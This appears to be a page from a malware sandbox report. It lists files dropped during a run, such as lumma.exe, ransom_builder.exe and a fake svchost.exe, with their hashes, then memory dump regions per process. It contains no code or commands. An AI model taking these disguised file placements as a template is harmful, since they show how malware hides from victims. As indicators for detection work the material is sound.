b5342b30d95d912b24f81d3a0540375861e562b2cb0dcad6cffee28602f2b1e1

SHA512
60946840c940530b2cf2e77f11fa97283c2035c9df048fc69c716f6b3b92919e70b8b5c72351d230a672cdff5f332187431e0af90d6aa2fbd192a0a71003d788

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat

Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
C:\Users\Admin\AppData\Roaming\chrome\logs.dat

Filesize
102B

MD5
a1457d6df4ec28c29d6a820b05e180a2

SHA1
17e8d3e67ca6367c147e4f01649d5a41a8aac960

SHA256
32b8c18cd5c99abf0770fe7b60cfee28cb083faa7c2cdcc380d4c512eca31d81

SHA512
51de92df545627a4628501cc8b97a14098d04bd6c796bcb4e0243d9733beaf76fe174345ae2ea77dcebc98d7cfb5b0f3ac970a02244e49f7bf5f373699530583

Download Submit
C:\Users\Public\svchost.exe

Filesize
24KB

MD5
b0907aa73e27d5499edd2023958ccb5d

SHA1
7a060030ae5cf0e71b206aff087142a29f395fc7

SHA256
cc214853632e80c5bc3f5824547fee996f3cec11a2c21f42202759bccff94734

SHA512
0871c57a5a6f02187b47554798eebc25ebe234dc33a9e2dc8b5fa25751a45eebce409d0cd739ff8351ef1f080447de1a0a667c73278c88d8cda353801e7cb615

Download Submit
C:\Windows\SysWOW64\SubDir\asg.exe

Filesize
375KB

MD5
83ccb5c523ac9743f9db41460fe8fcd2

SHA1
25b4f65c963cf5c8ddd5e283e337be74d394768c

SHA256
f05700c9cb3ee995d0b557716280c9e79c1f68ee6d57ce7a4f87b0ee4433fe29

SHA512
8e748c29b7097dcd56f5b7b92d7fcc104d9c11c349f268d258e9b2c6210e2d6bafda2d61b3d97fbe8c2e3b6caffe9b7b995cfee2b3240014029a6775d7af0e99

Download Submit
C:\Windows\System32\Bypass.exe

Filesize
320KB

MD5
d749478d503d1a9198fc0e6bc82874db

SHA1
eba5fa3eb6109081da86197abba6b4fb58d795f0

SHA256
60a47eb7ba4e85bac7406cd1a87bdc12b715fde62ecb6c6cf7a7c1cae3bbc2aa

SHA512
cdcf7be67467197164344ee3e372cc16595d646b00bae2220aeb00e4d162e04dcd3faf026b315415bab63da131a3a8875654db9e4598f7a32bd70118a4a03e1f

Download Submit
\ProgramData\WindowsSecurity.exe

Filesize
228KB

MD5
9ce720b312a0e884444b440a12218c4e

SHA1
08da8221245de0df49646f6a33c6dad5e61b956c

SHA256
12ee95070fc05d907a65e204ee0ee93081d37390422c15f3f654545b8bfde9b7

SHA512
f834637b53f60468d147fd3270aef3267c3d1b624adb512d0351dba74a1f70b60020c5b54b1467138b4dca479e4f1f5b6208950c5cd163ac4c65ddec7eb4ca54

Download Submit
\Users\Admin\AppData\Local\Temp\BBLb.exe

Filesize
369KB

MD5
8440239cfa98424f9bf0abdb836953b9

SHA1
eb84e7447aa5982fc885557ffa82895214a629f0

SHA256
9ac42b3310d67c2c3444a81a2d79f9c2401cccc52394b7d83c1e80b19870b718

SHA512
3430fae0e1a1d9a387398fe5483aa4a67ee696b4db7991fc9b850b4fc880b08a5402498e9f6b6d7dd3f786f9ba8faa4865fb7685d21c1ecdd8555102cd057315

Download Submit
\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
2.2MB

MD5
d2f31a944732400ae07cb08dc4fb1d29

SHA1
cfba4c36b8d82962d11bbc936fdebf814ebcac98

SHA256
f937c83359c20685437050858c49e0c58ff8de6fbea4a8660b63963325728da0

SHA512
40cad3d2dc51efde92acdd4394c62ea1eb89b5c0165b0ebc7dc27d28b9fb2a812a666e9e96d60ed72c5381b95aff0cdc62ec94bafaef9b5c1b45f5755276556d

Download Submit
\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
426KB

MD5
2971ae6fe1a1f82615a1481a00e9421e

SHA1
f62fc08379925f934cbde4e2e5535accb1b38c53

SHA256
4a2342e04e72edbc01a1573c4044e9417b6e771da644e6db3b8de3499d99dabe

SHA512
30efbb61ae23c73fb4d7e322948bd208544be3bf08059d18d230f54f6ff2c7517e5da80e17ce70a77d4643e8758b39b84df13c25e37afd14cc243b71a0c2dfef

Download Submit
\Users\Admin\AppData\Local\Temp\Files\NancyMfg.exe

Filesize
1.7MB

MD5
cc41c1b0765421f0f397e9be38949b7f

SHA1
750a326ef4917e4311bfd0a4534287b9c54dc926

SHA256
e3c6537ef0c305d9c7b242b88dcbff7b1a762b277b6d15d1372a41f44aa67c46

SHA512
7842742eb64699b0219c1cd516e3cf66d3f4d04e232720d185dfffc1471a3693b55fda418cee3a372bfcd89862ea1a5d1ed1aa6a2a6a70513364de5b02020646

Download Submit
\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe

Filesize
55KB

MD5
59ed620b90318c77ec464b22ab444334

SHA1
af50740c95c6c296eac9a374514ffc587de01a56

SHA256
59e406a485ddf4939e97ec5d08595fe343ab970681ee7d02c2f7dfb97e75e956

SHA512
bd5bd7758a114a389dcf26487a41d08c02097dab7eeda6037b269bd63b2d6893df91a995156be5496179fa18615614e70c000faed10bd6620269b5ed9aea5efe

Download Submit
\Users\Admin\AppData\Local\Temp\Files\asdfg.exe

Filesize
2.1MB

MD5
1a917a85dcbb1d3df5f4dd02e3a62873

SHA1
567f528fec8e7a4787f8c253446d8f1b620dc9d6

SHA256
217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e

SHA512
341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec

Download Submit
\Users\Admin\AppData\Local\Temp\Files\daissss.exe

Filesize
421KB

MD5
10a331a12ca40f3293dfadfcecb8d071

SHA1
ada41586d1366cf76c9a652a219a0e0562cc41af

SHA256
b58eec6e5aabc701404d5b5556c86fff5cc103c69eeda00061e838c4f122288f

SHA512
1a5b8e77ddbab97bb4c848adbcd7dbfb9ca84307d1844dba9572fcea48a2cbb091a3fc52663b87568416adf18a1338adc07aab0bd5f1ab36a03c8ff8a035d399

Download Submit
\Users\Admin\AppData\Local\Temp\Files\ghjk.exe

Filesize
282KB

MD5
44d1026b8b5dea0ec6d4d4042f35fdac

SHA1
b812e82ccbfc7a7a595d1a9c9523907143d09c8e

SHA256
89795e254de3ea25472143cc154389edd71a0831e7def2b545b66107cf6d4249

SHA512
90cd92d479f6f0e0f8229793310311bbfa3ba34c7339a28b80089892cf20274e171511140ecd0007a28786c216303c7ab5de91d44aeda12697d3ed1cd0f6fce0

Download Submit
\Users\Admin\AppData\Local\Temp\Files\lumma.exe

Filesize
73KB

MD5
0f709a219f077ee03b96fb9ed227c1ba

SHA1
62525eeb7fcde56ecc29799bb32f0f9078465b23

SHA256
4aea848b46696616fde5dc69f03d4f527e753317fbc3071b7b979e4fd9be0814

SHA512
de9e9070e09ab8e39b268e2ae5c864a3104829e3617e118493862748da7c79a356e84057e6089c326e3b49ff0b205eedc69359d1ec373b234bb4e8ee4fb76e60

Download Submit
\Users\Admin\AppData\Local\Temp\Files\ransom_builder.exe

Filesize
664KB

MD5
377adb72938e5833b1eed2cf783c66f7

SHA1
c6f9ed35f4a6ccedef6588eb13174a2b2ed8e641

SHA256
ebcbcd21d582b9b65205e37aca563389c7425f13dbbe40aac489718cbb97863b

SHA512
ec871baecfab99e4f2f78cb46c97c844379dfb7d0e74fdbcceca0bf8d431916077616c274872ac0c751ed9dfc7b77bf01398c3da29759599974eeb40966b8296

Download Submit
\Users\Admin\AppData\Local\Temp\Files\rty37.exe

Filesize
265KB

MD5
43633fd904cd8b36b1c60b2b89d77068

SHA1
861ce1539b9bcc1fea0f895e63c3ee9eed36dee4

SHA256
b25318af59a847fd5bff0e7943d9f8ac95e528325b6f106e5e5785e2317adb32

SHA512
f64abdb3779804552ebea1138e08fc95b996c2574f585dd47dd2baf66a09b3db15610c3001f918a867470ea98cbe91d7b96e52824bd4aa237453b6e55908dce0

Download Submit
\Users\Admin\AppData\Local\Temp\Files\update.exe

Filesize
140KB

MD5
b0b47a7516446fe9c6885b0bf7c4f591

SHA1
e6945de9eac053186a8ab7b1e0335fea1c2f1705

SHA256
d455ab58085b8733966b3f9dc23719a3f7060d466b304382e71b59ca8375cc33

SHA512
029103a6ad05b7e53eddc8eb7f34af6429d38134d7a3090c5c06abd2d5f31c537d3e965564898f25b8f0fafaf131c66a9266f93b285c4e5329017e91e58f9981

Download Submit
memory/268-2033-0x0000000077140000-0x0000000077216000-memory.dmp

Filesize
856KB

Download
memory/592-1715-0x00000000022D0000-0x00000000042D0000-memory.dmp

Filesize
32.0MB

Download
memory/592-1699-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/592-1709-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-1705-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-1520-0x00000000045A0000-0x00000000045F4000-memory.dmp

Filesize
336KB

Download
memory/592-2021-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-1702-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-1546-0x00000000046F0000-0x0000000004742000-memory.dmp

Filesize
328KB

Download
memory/592-2029-0x00000000022D0000-0x00000000042D0000-memory.dmp

Filesize
32.0MB

Download
memory/592-2026-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-2023-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/592-2019-0x0000000004780000-0x00000000047C0000-memory.dmp

Filesize
256KB

Download
memory/612-1997-0x000000006D890000-0x000000006DE3B000-memory.dmp

Filesize
5.7MB

Download
memory/612-2004-0x0000000002B50000-0x0000000002B90000-memory.dmp

Filesize
256KB

Download
memory/612-2003-0x000000006D890000-0x000000006DE3B000-memory.dmp

Filesize
5.7MB

Download
memory/612-2001-0x0000000002B50000-0x0000000002B90000-memory.dmp

Filesize
256KB

Download
memory/796-1744-0x00000000FFB80000-0x00000000FFC37000-memory.dmp

Filesize
732KB

Download
memory/1108-1855-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/1108-137-0x0000000000F70000-0x0000000001198000-memory.dmp

Filesize
2.2MB

Download
memory/1108-138-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/1428-1692-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1428-1718-0x0000000000400000-0x0000000000479000-memory.dmp

Filesize
484KB

Download
memory/1500-1998-0x0000000000120000-0x0000000000260000-memory.dmp

Filesize
1.2MB

Download
memory/1500-2015-0x0000000004AB0000-0x0000000004BD8000-memory.dmp

Filesize
1.2MB

Download
memory/1500-2008-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/1500-2011-0x0000000004790000-0x00000000047D0000-memory.dmp

Filesize
256KB

Download
memory/1500-2028-0x0000000004BE0000-0x0000000004D0A000-memory.dmp

Filesize
1.2MB

Download
memory/1904-1491-0x0000000000552000-0x0000000000594000-memory.dmp

Filesize
264KB

Download
memory/1904-1498-0x00000000002C0000-0x0000000000336000-memory.dmp

Filesize
472KB

Download
memory/1996-2005-0x0000000010000000-0x00000000100BB000-memory.dmp

Filesize
748KB

Download
memory/2216-1185-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/2216-0-0x0000000001230000-0x0000000001238000-memory.dmp

Filesize
32KB

Download
memory/2216-1-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/2216-2-0x0000000004D20000-0x0000000004D60000-memory.dmp

Filesize
256KB

Download
memory/2216-1350-0x0000000004D20000-0x0000000004D60000-memory.dmp

Filesize
256KB

Download
memory/2268-1612-0x00000000021AB000-0x0000000002212000-memory.dmp

Filesize
412KB

Download
memory/2268-1551-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2268-1555-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/2268-1599-0x000007FEF1C20000-0x000007FEF25BD000-memory.dmp

Filesize
9.6MB

Download
memory/2268-1602-0x00000000021A4000-0x00000000021A7000-memory.dmp

Filesize
12KB

Download
memory/2316-1871-0x000007FEF5530000-0x000007FEF5F1C000-memory.dmp

Filesize
9.9MB

Download
memory/2316-1880-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2316-1879-0x0000000000640000-0x000000000064C000-memory.dmp

Filesize
48KB

Download
memory/2316-1870-0x000000013F7C0000-0x000000013F7FC000-memory.dmp

Filesize
240KB

Download
memory/2320-2038-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2400-2043-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2540-94-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-1859-0x0000000005B20000-0x0000000005CC0000-memory.dmp

Filesize
1.6MB

Download
memory/2540-73-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/2540-1860-0x0000000000590000-0x00000000005DC000-memory.dmp

Filesize
304KB

Download
memory/2540-1857-0x00000000004D0000-0x00000000004D1000-memory.dmp

Filesize
4KB

Download
memory/2540-1856-0x0000000004A40000-0x0000000004A80000-memory.dmp

Filesize
256KB

Download
memory/2540-1741-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/2540-72-0x0000000000800000-0x0000000000A28000-memory.dmp

Filesize
2.2MB

Download
memory/2540-74-0x0000000004A80000-0x0000000004C88000-memory.dmp

Filesize
2.0MB

Download
memory/2540-75-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-76-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-120-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-80-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-82-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-122-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-146-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-143-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-139-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-128-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-126-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-124-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-118-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-130-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-78-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-96-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-112-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-110-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-108-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-106-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-104-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-102-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-100-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-114-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-98-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-84-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-92-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-90-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-86-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2540-88-0x0000000004A80000-0x0000000004C83000-memory.dmp

Filesize
2.0MB

Download
memory/2904-1141-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/2904-1147-0x0000000000EC0000-0x0000000000ED4000-memory.dmp

Filesize
80KB

Download
memory/2904-1188-0x0000000004DC0000-0x0000000004E00000-memory.dmp

Filesize
256KB

Download
memory/2904-1696-0x0000000004DC0000-0x0000000004E00000-memory.dmp

Filesize
256KB

Download
memory/2904-1928-0x0000000074150000-0x000000007483E000-memory.dmp

Filesize
6.9MB

Download
memory/3008-1882-0x000007FEF5530000-0x000007FEF5F1C000-memory.dmp

Filesize
9.9MB

Download
memory/3008-1355-0x000000013F930000-0x000000013F956000-memory.dmp

Filesize
152KB

Download
memory/3008-1689-0x000007FEF5530000-0x000007FEF5F1C000-memory.dmp

Filesize
9.9MB

Download
memory/3008-1733-0x000000001DC60000-0x000000001DCE0000-memory.dmp

Filesize
512KB

Download